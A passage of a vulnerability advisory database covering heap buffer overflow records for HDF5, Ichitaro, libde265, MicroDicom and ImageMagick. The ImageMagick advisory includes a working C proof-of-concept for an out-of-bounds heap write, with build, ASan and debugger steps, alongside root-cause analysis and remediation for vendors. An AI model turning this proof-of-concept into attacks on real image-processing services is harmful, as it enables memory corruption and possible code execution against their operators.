"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-41437"
},
{
"type": "WEB",
"url": "https://github.com/Helson-S/FuzzyTesting/blob/master/hicolor/heapof-r1-cp_unfilter-cute_png-1019c11/poc/sample6.png"
},
{
"type": "WEB",
"url": "https://github.com/Helson-S/FuzzyTesting/blob/master/hicolor/heapof-r1-cp_unfilter-cute_png-1019c11/vulDescription.assets/image-20240530183857985.png"
},
{
"type": "WEB",
"url": "https://github.com/Helson-S/FuzzyTesting/blob/master/hicolor/heapof-r1-cp_unfilter-cute_png-1019c11/vulDescription.md"
},
{
"type": "WEB",
"url": "https://github.com/Helson-S/FuzzyTesting/tree/master/hicolor/heapof-r1-cp_unfilter-cute_png-1019c11"
},
{
"type": "WEB",
"url": "https://github.com/Helson-S/FuzzyTesting/tree/master/hicolor/heapof-r1-cp_unfilter-cute_png-1019c11/poc"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-22HH-9PXH-MM6V
Vulnerability from github – Published: 2024-05-14 18:30 – Updated: 2024-07-03 18:40HDF5 Library through 1.14.3 contains a heap-based buffer overflow in H5T_copy_reopen in H5T.c, resulting in the corruption of the instruction pointer.
{
"affected": [],
"aliases": [
"CVE-2024-32619"
],
"database_specific": {
"cwe_ids": [
"CWE-122"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-05-14T15:36:47Z",
"severity": "HIGH"
},
"details": "HDF5 Library through 1.14.3 contains a heap-based buffer overflow in H5T_copy_reopen in H5T.c, resulting in the corruption of the instruction pointer.",
"id": "GHSA-22hh-9pxh-mm6v",
"modified": "2024-07-03T18:40:37Z",
"published": "2024-05-14T18:30:46Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-32619"
},
{
"type": "WEB",
"url": "https://www.hdfgroup.org/2024/05/new-hdf5-cve-issues-fixed-in-1-14-4"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-22P7-2347-C784
Vulnerability from github – Published: 2023-04-05 18:30 – Updated: 2024-04-04 03:22A heap-based buffer overflow vulnerability exists in the way Ichitaro version 2022 1.0.1.57600 processes certain LayoutBox stream record types. A specially crafted document can cause a buffer overflow, leading to memory corruption, which can result in arbitrary code execution.To trigger this vulnerability, the victim would need to open a malicious, attacker-created document.
{
"affected": [],
"aliases": [
"CVE-2023-22660"
],
"database_specific": {
"cwe_ids": [
"CWE-122"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-04-05T16:15:00Z",
"severity": "HIGH"
},
"details": "A heap-based buffer overflow vulnerability exists in the way Ichitaro version 2022 1.0.1.57600 processes certain LayoutBox stream record types. A specially crafted document can cause a buffer overflow, leading to memory corruption, which can result in arbitrary code execution.To trigger this vulnerability, the victim would need to open a malicious, attacker-created document.",
"id": "GHSA-22p7-2347-c784",
"modified": "2024-04-04T03:22:30Z",
"published": "2023-04-05T18:30:18Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-22660"
},
{
"type": "WEB",
"url": "https://jvn.jp/en/jp/JVN79149117"
},
{
"type": "WEB",
"url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1722"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-232G-H7W4-2PXJ
Vulnerability from github – Published: 2022-04-07 00:00 – Updated: 2022-04-15 00:01Heap-based Buffer Overflow in GitHub repository strukturag/libde265 prior to 1.0.8.
{
"affected": [],
"aliases": [
"CVE-2022-1253"
],
"database_specific": {
"cwe_ids": [
"CWE-122",
"CWE-787"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-04-06T12:15:00Z",
"severity": "CRITICAL"
},
"details": "Heap-based Buffer Overflow in GitHub repository strukturag/libde265 prior to 1.0.8.",
"id": "GHSA-232g-h7w4-2pxj",
"modified": "2022-04-15T00:01:08Z",
"published": "2022-04-07T00:00:20Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-1253"
},
{
"type": "WEB",
"url": "https://github.com/strukturag/libde265/commit/8e89fe0e175d2870c39486fdd09250b230ec10b8"
},
{
"type": "WEB",
"url": "https://huntr.dev/bounties/1-other-strukturag/libde265"
},
{
"type": "WEB",
"url": "https://www.debian.org/security/2023/dsa-5346"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-236W-6XXF-5G8V
Vulnerability from github – Published: 2024-03-01 03:30 – Updated: 2024-03-01 03:30MicroDicom DICOM Viewer versions 2023.3 (Build 9342) and prior are affected by a heap-based buffer overflow vulnerability, which could allow an attacker to execute arbitrary code on affected installations of DICOM Viewer. A user must open a malicious DCM file in order to exploit the vulnerability.
{
"affected": [],
"aliases": [
"CVE-2024-22100"
],
"database_specific": {
"cwe_ids": [
"CWE-122"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-03-01T01:15:07Z",
"severity": "HIGH"
},
"details": "\n\n\n\n\nMicroDicom DICOM Viewer versions 2023.3 (Build 9342) and prior are affected by a heap-based buffer overflow vulnerability, which could allow an attacker to execute arbitrary code on affected installations of DICOM Viewer. A user must open a malicious DCM file in order to exploit the vulnerability.\n\n\n\n\n\n",
"id": "GHSA-236w-6xxf-5g8v",
"modified": "2024-03-01T03:30:34Z",
"published": "2024-03-01T03:30:34Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22100"
},
{
"type": "WEB",
"url": "https://www.cisa.gov/news-events/ics-medical-advisories/icsma-24-060-01"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-23HG-53Q6-HQFG
Vulnerability from github – Published: 2025-09-05 20:09 – Updated: 2025-11-03 21:34Reporter: Lumina Mescuwa
Product: ImageMagick 7 (MagickCore)
Component: MagickCore/blob.c (Blob I/O - BlobStream)
Tested: 7.1.2-0 (source tag) and 7.1.2-1 (Homebrew), macOS arm64, clang-17, Q16-HDRI
Impact: Heap out-of-bounds WRITE (attacker-controlled bytes at attacker-chosen offset) → memory corruption; potential code execution
Executive Summary
For memory-backed blobs (BlobStream), SeekBlob() permits advancing the stream offset beyond the current end without increasing capacity. The subsequent WriteBlob() then expands by quantum + length (amortized) instead of offset + length, and copies to data + offset. When offset ≫ extent, the copy targets memory beyond the allocation, producing a deterministic heap write on 64-bit builds. No 2⁶⁴ arithmetic wrap, external delegates, or policy settings are required.
Affected Scope
-
Versions confirmed: 7.1.2-0, 7.1.2-1
-
Architectures: Observed on macOS arm64; architecture-agnostic on LP64
-
Paths: MagickCore blob subsystem — BlobStream (
SeekBlob()andWriteBlob()). -
Not required: External delegates; special policies; integer wraparound
Technical Root Cause
Types (LP64):
offset: MagickOffsetType (signed 64-bit)
extent/length/quantum: size_t (unsigned 64-bit)
data: unsigned char*
Contract mismatch:
-
SeekBlob()(BlobStream) updatesoffsetto arbitrary positions, including past end, without capacity adjustment. -
WriteBlob()testsoffset + length >= extentand grows bylength + quantum, doublesquantum, reallocates toextent + 1, then:q = data + (size_t)offset; memmove(q, src, length);There is no guarantee that
extent ≥ offset + lengthpost-growth. Withoffset ≫ extent,qis beyond the allocation.
Wrap-free demonstration:
Initialize extent=1, write one byte (offset=1), seek to 0x10000000 (256 MiB), then write 3–4 bytes. Growth remains << offset + length; the copy overruns the heap buffer.
Exploitability & Reachability
-
Primitive: Controlled bytes written at a controlled displacement from the buffer base.
-
Reachability: Any encode-to-memory flow that forward-seeks prior to writing (e.g., header back-patching, reserved-space strategies). Even if current encoders/writers avoid this, the API contract permits it, thus creating a latent sink for first- or third-party encoders/writers.
-
Determinism: Once a forward seek past end occurs, the first subsequent write reliably corrupts memory.
Impact Assessment
-
Integrity: High - adjacent object/metadata overwrite plausible.
-
Availability: High - reliably crashable (ASan and non-ASan).
-
Confidentiality: High - Successful exploitation to RCE allows the attacker to read all data accessible by the compromised process.
-
RCE plausibility: Typical of heap OOB writes in long-lived image services; allocator/layout dependent.
CVSS v3.1 Rationale (9.8)
-
AV:N / PR:N / UI:N - server-side image processing is commonly network-reachable without auth or user action.
-
AC:L - a single forward seek + write suffices; no races or specialized state.
-
S:U - corruption localized to the ImageMagick process.
-
C:H / I:H / A:H - A successful exploit leads to RCE, granting full control over the process. This results in a total loss of Confidentiality (reading sensitive data), Integrity (modifying files/data), and Availability (terminating the service).
Base scoring assumes successful exploitation; environmental mitigations are out of scope of Base metrics.
Violated Invariant
Before copying
lengthbytes atoffset, enforceextent ≥ offset + lengthwith overflow-checked arithmetic.
The BlobStream growth policy preserves amortized efficiency but fails to enforce this per-write safety invariant.
Remediation (Principle)
In WriteBlob() (BlobStream case):
-
Checked requirement:
need = (size_t)offset + length;→ ifneed < (size_t)offset, overflow → fail. -
Ensure capacity ≥ need:
target = MagickMax(extent + quantum + length, need);
(Optionally loop, doublingquantum, untilextent ≥ needto preserve amortization.) -
Reallocate to
target + 1before copying; then perform the move.
Companion hardening (recommended):
-
Document or restrict
SeekBlob()on BlobStream so forward seeks either trigger explicit growth/zero-fill or require the subsequent write to meet the invariant. -
Centralize blob arithmetic in checked helpers.
-
Unit tests: forward-seek-then-write (success and overflow-reject).
Regression & Compatibility
-
Behavior change: Forward-seeked writes will either allocate to required size or fail cleanly (overflow/alloc-fail).
-
Memory profile: Single writes after very large seeks may allocate large buffers; callers requiring sparse behavior should use file-backed streams.
Vendor Verification Checklist
-
Reproduce with a minimal in-memory BlobStream harness under ASan.
-
Apply fix; verify
extent ≥ offset + lengthat all write sites. -
Add forward-seek test cases (positive/negative).
-
Audit other growth sites (
SetBlobExtent, stream helpers). -
Clarify BlobStream seek semantics in documentation.
-
Unit test: forward seek to large offset on BlobStream followed by 1–8 byte writes; assert either growth to
needor clean failure.
PoC / Reproduction / Notes
Environment
-
OS/Arch: macOS 14 (arm64)
-
Compiler: clang-17 with AddressSanitizer
-
ImageMagick: Q16-HDRI
-
Prefix:
~/opt/im-7.1.2-0 -
pkg-config: from PATH (no hard-coded/usr/local/...)
Build ImageMagick 7.1.2-0 (static, minimal)
./configure --prefix="$HOME/opt/im-7.1.2-0" --enable-hdri --with-quantum-depth=16 \
--disable-shared --enable-static --without-modules \
--without-magick-plus-plus --disable-openmp --without-perl \
--without-x --without-lqr --without-gslib
make -j"$(sysctl -n hw.ncpu)"
make install
"$HOME/opt/im-7.1.2-0/bin/magick" -version > magick_version.txt
Build & Run the PoC (memory-backed BlobStream)
poc.c:
Uses private headers (blob-private.h) to exercise blob internals; a public-API variant (custom streams) is feasible but unnecessary for triage.
// poc.c
#include <stdio.h>
#include <stdlib.h>
#include <MagickCore/MagickCore.h>
#include <MagickCore/blob.h>
#include "MagickCore/blob-private.h"
int main(int argc, char **argv) {
MagickCoreGenesis(argv[0], MagickTrue);
ExceptionInfo *e = AcquireExceptionInfo();
ImageInfo *ii = AcquireImageInfo();
Image *im = AcquireImage(ii, e);
if (!im) return 1;
// 1-byte memory blob → BlobStream
unsigned char *buf = (unsigned char*) malloc(1);
buf[0] = 0x41;
AttachBlob(im->blob, buf, 1); // type=BlobStream, extent=1, offset=0
SetBlobExempt(im, MagickTrue); // don't free our malloc'd buf
// Step 1: write 1 byte (creates BlobInfo + sets offset=1)
unsigned char A = 0x42;
(void) WriteBlob(im, 1, &A);
fprintf(stderr, "[+] after 1 byte: off=%lld len=%zu\n",
(long long) TellBlob(im), (size_t) GetBlobSize(im));
// Step 2: seek way past end without growing capacity
const MagickOffsetType big = (MagickOffsetType) 0x10000000; // 256 MiB
(void) SeekBlob(im, big, SEEK_SET);
fprintf(stderr, "[+] after seek: off=%lld len=%zu\n",
(long long) TellBlob(im), (size_t) GetBlobSize(im));
// Step 3: small write → reallocation grows by quantum+length, not to offset+length
// memcpy then writes to data + offset (OOB)
const unsigned char payload[] = "PWN";
(void) WriteBlob(im, sizeof(payload), payload);
// If we get here, it didn't crash
fprintf(stderr, "[-] no crash; check ASan flags.\n");
(void) CloseBlob(im);
DestroyImage(im); DestroyImageInfo(ii); DestroyExceptionInfo(e);
MagickCoreTerminus();
return 0;
}
run:
# Use the private prefix for pkg-config
export PKG_CONFIG_PATH="$HOME/opt/im-7.1.2-0/lib/pkgconfig:$PKG_CONFIG_PATH"
# Strict ASan for crisp failure
export ASAN_OPTIONS='halt_on_error=1:abort_on_error=1:detect_leaks=0:fast_unwind_on_malloc=0'
# Compile (static link pulls transitive deps via --static)
clang -std=c11 -g -O1 -fno-omit-frame-pointer -fsanitize=address -o poc poc.c \
$(pkg-config --cflags MagickCore-7.Q16HDRI) \
$(pkg-config --static --libs MagickCore-7.Q16HDRI)
# Execute and capture
./poc 2>&1 | tee asan.log
Expected markers prior to the fault:
[+] after 1 byte: off=1 len=1
[+] after seek: off=268435456 len=1
An ASan WRITE crash in WriteBlob follows (top frames: WriteBlob blob.c:<line>, then _platform_memmove / __sanitizer_internal_memmove).
Debugger Verification (manual)
LLDB can be used to snapshot the invariants; ASan alone is sufficient.
lldb ./poc
(lldb) settings set use-color false
(lldb) break set -n WriteBlob
(lldb) run
# First stop (prime write)
(lldb) frame var length
(lldb) frame var image->blob->type image->blob->offset image->blob->length image->blob->extent image->blob->quantum image->blob->mapped
(lldb) continue
# Second stop (post-seek write)
(lldb) frame var length
(lldb) frame var image->blob->type image->blob->offset image->blob->length image->blob->extent image->blob->quantum image->blob->mapped
(lldb) expr -- (unsigned long long)image->blob->offset + (unsigned long long)length
(lldb) expr -- (void*)((unsigned char*)image->blob->data + (size_t)image->blob->offset)
# Into the fault; if inside memmove (no locals):
(lldb) bt
(lldb) frame select 1
(lldb) frame var image->blob->offset image->blob->length image->blob->extent image->blob->quantum
Expected at second stop:
type = BlobStream · offset ≈ 0x10000000 (256 MiB) · length ≈ 3–4 · extent ≈ 64 KiB (≪ offset + length) · quantum ≈ 128 KiB · mapped = MagickFalse · data + offset far beyond base; next continue crashes in _platform_memmove.
Credits
Reported by: Lumina Mescuwa
{
"affected": [
{
"package": {
"ecosystem": "NuGet",
"name": "Magick.NET-Q16-x64"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "14.8.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "NuGet",
"name": "Magick.NET-Q8-x64"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "14.8.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "NuGet",
"name": "Magick.NET-Q16-HDRI-x64"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "14.8.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "NuGet",
"name": "Magick.NET-Q8-OpenMP-x64"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "14.8.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "NuGet",
"name": "Magick.NET-Q16-HDRI-OpenMP-x64"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "14.8.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "NuGet",
"name": "Magick.NET-Q16-OpenMP-x64"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "14.8.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "NuGet",
"name": "Magick.NET-Q8-arm64"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "14.8.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "NuGet",
"name": "Magick.NET-Q16-arm64"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "14.8.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "NuGet",
"name": "Magick.NET-Q16-OpenMP-arm64"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "14.8.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "NuGet",
"name": "Magick.NET-Q8-OpenMP-arm64"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "14.8.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "NuGet",
"name": "Magick.NET-Q16-HDRI-OpenMP-arm64"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "14.8.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "NuGet",
"name": "Magick.NET-Q16-HDRI-arm64"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "14.8.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-57807"
],
"database_specific": {
"cwe_ids": [
"CWE-122",
"CWE-131",
"CWE-787"
],
"github_reviewed": true,
"github_reviewed_at": "2025-09-05T20:09:19Z",
"nvd_published_at": "2025-09-05T22:15:34Z",
"severity": "LOW"
},
"details": "**Reporter:**\u00a0Lumina Mescuwa \n**Product:**\u00a0ImageMagick 7 (MagickCore) \n**Component:**\u00a0`MagickCore/blob.c`\u00a0(Blob I/O - BlobStream) \n**Tested:**\u00a07.1.2-0 (source tag) and 7.1.2-1 (Homebrew), macOS arm64, clang-17, Q16-HDRI \n**Impact:**\u00a0Heap out-of-bounds\u00a0**WRITE**\u00a0(attacker-controlled bytes at attacker-chosen offset) \u2192 memory corruption; potential code execution \n\n---\n\n## Executive Summary\n\nFor memory-backed blobs (**BlobStream**),\u00a0[`SeekBlob()`](https://github.com/ImageMagick/ImageMagick/blob/3fcd081c0278427fc0e8ac40ef75c0a1537792f7/MagickCore/blob.c#L5106-L5134)\u00a0permits advancing the stream\u00a0**offset**\u00a0beyond the current end without increasing capacity. The subsequent\u00a0[`WriteBlob()`](https://github.com/ImageMagick/ImageMagick/blob/3fcd081c0278427fc0e8ac40ef75c0a1537792f7/MagickCore/blob.c#L5915-L5938)\u00a0then expands by\u00a0**`quantum + length`**\u00a0(amortized) instead of\u00a0**`offset + length`**, and copies to\u00a0`data + offset`. When\u00a0`offset \u226b extent`, the copy targets memory beyond the allocation, producing a deterministic heap write on 64-bit builds. No 2\u2076\u2074 arithmetic wrap, external delegates, or policy settings are required.\n\n---\n\n## Affected Scope\n\n- **Versions confirmed:**\u00a07.1.2-0, 7.1.2-1\n \n- **Architectures:**\u00a0Observed on macOS arm64; architecture-agnostic on LP64\n \n- Paths: MagickCore blob subsystem \u2014\u00a0**BlobStream**\u00a0([`SeekBlob()`](https://github.com/ImageMagick/ImageMagick/blob/3fcd081c0278427fc0e8ac40ef75c0a1537792f7/MagickCore/blob.c#L5106-L5134)\u00a0and\u00a0[`WriteBlob()`](https://github.com/ImageMagick/ImageMagick/blob/3fcd081c0278427fc0e8ac40ef75c0a1537792f7/MagickCore/blob.c#L5915-L5938)).\n \n- **Not required:**\u00a0External delegates; special policies; integer wraparound\n \n\n---\n\n## Technical Root Cause\n\n**Types (LP64):** \n`offset: MagickOffsetType`\u00a0(signed 64-bit) \n`extent/length/quantum: size_t`\u00a0(unsigned 64-bit) \n`data: unsigned char*`\n\n**Contract mismatch:**\n\n- [`SeekBlob()`](https://github.com/ImageMagick/ImageMagick/blob/3fcd081c0278427fc0e8ac40ef75c0a1537792f7/MagickCore/blob.c#L5106-L5134)\u00a0(BlobStream) updates\u00a0`offset`\u00a0to arbitrary positions, including past end,\u00a0**without**\u00a0capacity adjustment.\n \n- [`WriteBlob()`](https://github.com/ImageMagick/ImageMagick/blob/3fcd081c0278427fc0e8ac40ef75c0a1537792f7/MagickCore/blob.c#L5915-L5938)\u00a0tests\u00a0`offset + length \u003e= extent`\u00a0and grows\u00a0**by**\u00a0`length + quantum`, doubles\u00a0`quantum`, reallocates to\u00a0`extent + 1`, then:\n \n ```\n q = data + (size_t)offset;\n memmove(q, src, length);\n ```\n \n There is\u00a0**no guarantee**\u00a0that\u00a0`extent \u2265 offset + length`\u00a0post-growth. With\u00a0`offset \u226b extent`,\u00a0`q`\u00a0is beyond the allocation.\n \n\n**Wrap-free demonstration:** \nInitialize\u00a0`extent=1`, write one byte (`offset=1`), seek to\u00a0`0x10000000`\u00a0(256 MiB), then write 3\u20134 bytes. Growth remains \u003c\u003c\u00a0`offset + length`; the copy overruns the heap buffer.\n\n---\n\n## Exploitability \u0026 Reachability\n\n- **Primitive:**\u00a0Controlled bytes written at a controlled displacement from the buffer base.\n \n- **Reachability:**\u00a0Any encode-to-memory flow that forward-seeks prior to writing (e.g., header back-patching, reserved-space strategies). Even if current encoders/writers avoid this, the API contract\u00a0**permits**\u00a0it, thus creating a latent sink for first- or third-party encoders/writers.\n \n- **Determinism:**\u00a0Once a forward seek past end occurs, the first subsequent write reliably corrupts memory.\n \n\n---\n\n## Impact Assessment\n\n- **Integrity:**\u00a0High - adjacent object/metadata overwrite plausible.\n \n- **Availability:**\u00a0High - reliably crashable (ASan and non-ASan).\n \n- **Confidentiality:**\u00a0High - Successful exploitation to RCE allows the attacker to read all data accessible by the compromised process.\n \n- **RCE plausibility:**\u00a0Typical of heap OOB writes in long-lived image services; allocator/layout dependent.\n \n\n---\n\n## CVSS v3.1 Rationale (9.8)\n\n- **AV:N / PR:N / UI:N**\u00a0- server-side image processing is commonly network-reachable without auth or user action.\n \n- **AC:L**\u00a0- a single forward seek + write suffices; no races or specialized state.\n \n- **S:U**\u00a0- corruption localized to the ImageMagick process.\n \n- **C:H / I:H / A:H**\u00a0- A successful exploit leads to RCE, granting full control over the process. This results in a total loss of Confidentiality (reading sensitive data), Integrity (modifying files/data), and Availability (terminating the service).\n \n\n_Base scoring assumes successful exploitation; environmental mitigations are out of scope of Base metrics._\n\n---\n\n## Violated Invariant\n\n\u003e **Before copying\u00a0`length`\u00a0bytes at\u00a0`offset`, enforce\u00a0`extent \u2265 offset + length`\u00a0with overflow-checked arithmetic.**\n\nThe BlobStream growth policy preserves amortized efficiency but fails to enforce this\u00a0**per-write**\u00a0safety invariant.\n\n---\n\n## Remediation (Principle)\n\nIn\u00a0[`WriteBlob()`](https://github.com/ImageMagick/ImageMagick/blob/3fcd081c0278427fc0e8ac40ef75c0a1537792f7/MagickCore/blob.c#L5915-L5938)\u00a0(BlobStream case):\n\n1. **Checked requirement:** \n `need = (size_t)offset + length;`\u00a0\u2192 if\u00a0`need \u003c (size_t)offset`, overflow \u2192 fail.\n \n2. **Ensure capacity \u2265 need:** \n `target = MagickMax(extent + quantum + length, need);` \n (Optionally loop, doubling\u00a0`quantum`, until\u00a0`extent \u2265 need`\u00a0to preserve amortization.)\n \n3. **Reallocate to\u00a0`target + 1`\u00a0before copying;**\u00a0then perform the move.\n \n\n**Companion hardening (recommended):**\n\n- Document or restrict\u00a0[`SeekBlob()`](https://github.com/ImageMagick/ImageMagick/blob/3fcd081c0278427fc0e8ac40ef75c0a1537792f7/MagickCore/blob.c#L5106-L5134)\u00a0on BlobStream so forward seeks either trigger explicit growth/zero-fill or require the subsequent write to meet the invariant.\n \n- Centralize blob arithmetic in checked helpers.\n \n- Unit tests: forward-seek-then-write (success and overflow-reject).\n \n\n---\n\n## Regression \u0026 Compatibility\n\n- **Behavior change:**\u00a0Forward-seeked writes will either allocate to required size or fail cleanly (overflow/alloc-fail).\n \n- **Memory profile:**\u00a0Single writes after very large seeks may allocate large buffers; callers requiring sparse behavior should use file-backed streams.\n \n\n---\n\n## Vendor Verification Checklist\n\n- Reproduce with a minimal in-memory BlobStream harness under ASan.\n \n- Apply fix; verify\u00a0`extent \u2265 offset + length`\u00a0at all write sites.\n \n- Add forward-seek test cases (positive/negative).\n \n- Audit other growth sites (`SetBlobExtent`, stream helpers).\n \n- Clarify BlobStream seek semantics in documentation.\n \n- Unit test: forward seek to large offset on\u00a0**BlobStream**\u00a0followed by 1\u20138 byte writes; assert either growth to\u00a0`need`\u00a0or clean failure.\n \n\n---\n\n# PoC / Reproduction / Notes\n\n## Environment\n\n- **OS/Arch:**\u00a0macOS 14 (arm64)\n \n- **Compiler:**\u00a0clang-17 with AddressSanitizer\n \n- **ImageMagick:**\u00a0Q16-HDRI\n \n- **Prefix:**\u00a0`~/opt/im-7.1.2-0`\n \n- **`pkg-config`:**\u00a0from PATH (no hard-coded\u00a0`/usr/local/...`)\n \n\n---\n\n## Build ImageMagick 7.1.2-0 (static, minimal)\n\n```bash\n./configure --prefix=\"$HOME/opt/im-7.1.2-0\" --enable-hdri --with-quantum-depth=16 \\\n --disable-shared --enable-static --without-modules \\\n --without-magick-plus-plus --disable-openmp --without-perl \\\n --without-x --without-lqr --without-gslib\n\nmake -j\"$(sysctl -n hw.ncpu)\"\nmake install\n\n\"$HOME/opt/im-7.1.2-0/bin/magick\" -version \u003e magick_version.txt\n```\n\n---\n\n## Build \u0026 Run the PoC (memory-backed BlobStream)\n\n**`poc.c`:** \n_Uses private headers (`blob-private.h`) to exercise blob internals; a public-API variant (custom streams) is feasible but unnecessary for triage._\n\n```c\n// poc.c\n\n#include \u003cstdio.h\u003e\n\n#include \u003cstdlib.h\u003e\n\n#include \u003cMagickCore/MagickCore.h\u003e\n\n#include \u003cMagickCore/blob.h\u003e\n\n#include \"MagickCore/blob-private.h\"\n\n \n\nint main(int argc, char **argv) {\n\nMagickCoreGenesis(argv[0], MagickTrue);\n\nExceptionInfo *e = AcquireExceptionInfo();\n\nImageInfo *ii = AcquireImageInfo();\n\nImage *im = AcquireImage(ii, e);\n\nif (!im) return 1;\n\n \n\n// 1-byte memory blob \u2192 BlobStream\n\nunsigned char *buf = (unsigned char*) malloc(1);\n\nbuf[0] = 0x41;\n\nAttachBlob(im-\u003eblob, buf, 1); // type=BlobStream, extent=1, offset=0\n\nSetBlobExempt(im, MagickTrue); // don\u0027t free our malloc\u0027d buf\n\n \n\n// Step 1: write 1 byte (creates BlobInfo + sets offset=1)\n\nunsigned char A = 0x42;\n\n(void) WriteBlob(im, 1, \u0026A);\n\nfprintf(stderr, \"[+] after 1 byte: off=%lld len=%zu\\n\",\n\n(long long) TellBlob(im), (size_t) GetBlobSize(im));\n\n \n\n// Step 2: seek way past end without growing capacity\n\nconst MagickOffsetType big = (MagickOffsetType) 0x10000000; // 256 MiB\n\n(void) SeekBlob(im, big, SEEK_SET);\n\nfprintf(stderr, \"[+] after seek: off=%lld len=%zu\\n\",\n\n(long long) TellBlob(im), (size_t) GetBlobSize(im));\n\n \n\n// Step 3: small write \u2192 reallocation grows by quantum+length, not to offset+length\n\n// memcpy then writes to data + offset (OOB)\n\nconst unsigned char payload[] = \"PWN\";\n\n(void) WriteBlob(im, sizeof(payload), payload);\n\n \n\n// If we get here, it didn\u0027t crash\n\nfprintf(stderr, \"[-] no crash; check ASan flags.\\n\");\n\n \n\n(void) CloseBlob(im);\n\nDestroyImage(im); DestroyImageInfo(ii); DestroyExceptionInfo(e);\n\nMagickCoreTerminus();\n\nreturn 0;\n\n}\n```\n\n---\n\n`run:`\n\n```bash\n# Use the private prefix for pkg-config\nexport PKG_CONFIG_PATH=\"$HOME/opt/im-7.1.2-0/lib/pkgconfig:$PKG_CONFIG_PATH\"\n\n# Strict ASan for crisp failure\nexport ASAN_OPTIONS=\u0027halt_on_error=1:abort_on_error=1:detect_leaks=0:fast_unwind_on_malloc=0\u0027\n\n# Compile (static link pulls transitive deps via --static)\nclang -std=c11 -g -O1 -fno-omit-frame-pointer -fsanitize=address -o poc poc.c \\\n $(pkg-config --cflags MagickCore-7.Q16HDRI) \\\n $(pkg-config --static --libs MagickCore-7.Q16HDRI)\n\n# Execute and capture\n./poc 2\u003e\u00261 | tee asan.log\n```\n\n**Expected markers prior to the fault:**\n\n```\n[+] after 1 byte: off=1 len=1\n[+] after seek: off=268435456 len=1\n```\n\nAn ASan\u00a0**WRITE**\u00a0crash in\u00a0[`WriteBlob`](https://github.com/ImageMagick/ImageMagick/blob/3fcd081c0278427fc0e8ac40ef75c0a1537792f7/MagickCore/blob.c#L5915-L5938)\u00a0follows (top frames:\u00a0`WriteBlob blob.c:\u003cline\u003e`, then\u00a0`_platform_memmove`\u00a0/\u00a0`__sanitizer_internal_memmove`).\n\n---\n\n## Debugger Verification (manual)\n\nLLDB can be used to snapshot the invariants; ASan alone is sufficient.\n\n```\nlldb ./poc\n(lldb) settings set use-color false\n(lldb) break set -n WriteBlob\n(lldb) run\n\n# First stop (prime write)\n(lldb) frame var length\n(lldb) frame var image-\u003eblob-\u003etype image-\u003eblob-\u003eoffset image-\u003eblob-\u003elength image-\u003eblob-\u003eextent image-\u003eblob-\u003equantum image-\u003eblob-\u003emapped\n(lldb) continue\n\n# Second stop (post-seek write)\n(lldb) frame var length\n(lldb) frame var image-\u003eblob-\u003etype image-\u003eblob-\u003eoffset image-\u003eblob-\u003elength image-\u003eblob-\u003eextent image-\u003eblob-\u003equantum image-\u003eblob-\u003emapped\n(lldb) expr -- (unsigned long long)image-\u003eblob-\u003eoffset + (unsigned long long)length\n(lldb) expr -- (void*)((unsigned char*)image-\u003eblob-\u003edata + (size_t)image-\u003eblob-\u003eoffset)\n\n# Into the fault; if inside memmove (no 